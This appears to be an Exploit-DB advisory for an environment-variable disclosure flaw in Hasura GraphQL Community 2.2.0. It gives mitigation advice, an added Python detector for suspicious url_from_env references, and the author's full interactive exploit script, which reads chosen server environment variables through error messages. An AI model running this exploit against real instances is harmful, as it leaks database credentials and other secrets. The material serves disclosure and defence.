Vendor: GraphQL Community
By: Dolev Farhi
CVSS: 8.8 (HIGH)
Type: Information Disclosure
CWE: 200
Product Name: GraphQL Community
Affected Version From: 2.2.0
Affected Version To: 2.2.0
Patch Exists: YES
Related CWE:
CPE: a:hasura:graphql-engine:2.2.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
Year: 2022

Hasura GraphQL 2.2.0 – Information Disclosure

An information disclosure vulnerability exists in Hasura GraphQL Community 2.2.0. The metadata API's `add_remote_schema` action accepts a `url_from_env` field naming an environment variable that is supposed to hold the remote schema's URL. When the value of the named variable is not a valid URI, the engine echoes that value back in the error message (after the text 'not a valid URI:'), so anyone who can POST to the '/v1/metadata' endpoint can read any environment variable of the engine process one request at a time, including database connection strings and other secrets. The exploit below sends no admin-secret header, so as written it applies to instances whose metadata API is reachable without one; where HASURA_GRAPHQL_ADMIN_SECRET is set, the same request requires that secret. If the variable's value does happen to be a valid URI, the 'not a valid URI:' marker is absent, the engine instead tries to register a remote schema named 'ttt', and the script falls back to dumping whatever error came back.

Mitigation:

Upgrade to the latest version of Hasura GraphQL Community. Independently of the upgrade, never expose the metadata API without an admin secret (HASURA_GRAPHQL_ADMIN_SECRET), and keep it off the public internet; the request in this exploit is an administrative action and should not be reachable by unauthenticated clients.
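Added example (not part of the advisory or of the Hasura code base): a small Python module that shows, on constructed input, how the abused request hides inside a `bulk` metadata call, how to flag `url_from_env` references that fall outside an operator allowlist, and how the leaked value is parsed out of the engine's error. The request body mirrors the exploit; the variable name HASURA_GRAPHQL_DATABASE_URL, the allowlist, and the shape of the error object are assumptions, with only the 'not a valid URI:' marker taken from the exploit's own parsing.

```python
"""Spotting the url_from_env leak in Hasura metadata-API traffic.

Added example, not code from the advisory or from the Hasura project.
Two halves: locate `url_from_env` references buried in a `bulk` request
body, and pull the reflected value out of an error response.
"""
from typing import Any, Dict, Iterable, List, Optional, Tuple

# The only string taken from the exploit: the text the engine emits before
# the reflected variable value.
MARKER = "not a valid URI:"

# Constructed: the bulk body the exploit sends, here aimed at the engine's
# database URL variable (the target name is an assumption, not from the page).
SAMPLE_REQUEST: Dict[str, Any] = {
    "type": "bulk",
    "source": "",
    "args": [
        {
            "type": "add_remote_schema",
            "args": {
                "name": "ttt",
                "definition": {
                    "timeout_seconds": 60,
                    "forward_client_headers": False,
                    "headers": [],
                    "url_from_env": "HASURA_GRAPHQL_DATABASE_URL",
                },
                "comment": "",
            },
        }
    ],
    "resource_version": 2,
}

# Constructed: an error response of the assumed shape. The value after the
# marker is a made-up connection string, not real data.
SAMPLE_ERROR: Dict[str, Any] = {
    "path": "$.args",
    "code": "parse-failed",
    "error": "not a valid URI: postgres://hasura:s3cr3t@db.internal:5432/app",
}


def find_url_from_env_refs(
    body: Any, enclosing_type: Optional[str] = None
) -> List[Tuple[Optional[str], str]]:
    """Walk a metadata-API body and return (action type, env var name) for
    every `url_from_env` string, however deeply it is nested in bulk args."""
    refs: List[Tuple[Optional[str], str]] = []
    if isinstance(body, dict):
        # Remember the nearest enclosing action so the report can name it.
        action = body.get("type")
        if isinstance(action, str):
            enclosing_type = action
        for key, value in body.items():
            if key == "url_from_env" and isinstance(value, str):
                refs.append((enclosing_type, value))
            else:
                refs.extend(find_url_from_env_refs(value, enclosing_type))
    elif isinstance(body, list):
        for item in body:
            refs.extend(find_url_from_env_refs(item, enclosing_type))
    return refs


def flag_unexpected_env_refs(body: Any, allowed: Iterable[str]) -> List[str]:
    """Return env var names referenced via url_from_env that are not on the
    operator's allowlist of variables meant to hold remote-schema URLs."""
    allowed_set = set(allowed)
    return sorted(
        {name for _, name in find_url_from_env_refs(body) if name not in allowed_set}
    )


def extract_leaked_value(response: Dict[str, Any]) -> Optional[str]:
    """Return the reflected variable value from an error response, or None
    when the response does not carry the marker (e.g. a different error)."""
    error = response.get("error")
    if not isinstance(error, str) or MARKER not in error:
        return None
    return error.split(MARKER, 1)[1].strip()


if __name__ == "__main__":
    print("references:", find_url_from_env_refs(SAMPLE_REQUEST))
    print("unexpected:", flag_unexpected_env_refs(SAMPLE_REQUEST, {"REMOTE_SCHEMA_URL"}))
    print("leaked:", extract_leaked_value(SAMPLE_ERROR))
```

Run stand-alone it prints the three results for the constructed samples. To use the detection half on real traffic, decode each request body sent to /v1/metadata (a WAF or reverse-proxy hook, or request logging) and feed it to flag_unexpected_env_refs with the list of variables your deployment actually uses for remote schema URLs; anything it returns is a read attempt on a variable no remote schema should need.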

Exploit-DB raw data:

# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
        continue

    # The engine resolves url_from_env server-side; when the variable's value
    # is not a valid URI it reflects the value in the error message.
    payload = {
        "type": "bulk",
        "source": "",
        "args": [
            {
                "type": "add_remote_schema",
                "args": {
                    "name": "ttt",
                    "definition": {
                        "timeout_seconds": 60,
                        "forward_client_headers": False,
                        "headers": [],
                        "url_from_env": env_var
                    },
                    "comment": ""
                }
            }
        ],
        "resource_version": 2
    }
    # No admin-secret header is sent: this only works where the metadata API
    # is reachable without one.
    r = requests.post(url, json=payload)
    try:
        body = r.json()
    except ValueError:
        print('Non-JSON response (HTTP {}), dumping body as is'.format(r.status_code))
        print(r.text)
        continue
    try:
        # Everything after the marker is the variable's value.
        print(body['error'].split('not a valid URI:')[1].strip())
    except (KeyError, IndexError):
        # No 'error' key (e.g. the remote schema was actually added) or an
        # error without the marker: show what came back.
        print('Could not parse out VAR, dumping error as is')
        print(body.get('error', 'N/A'))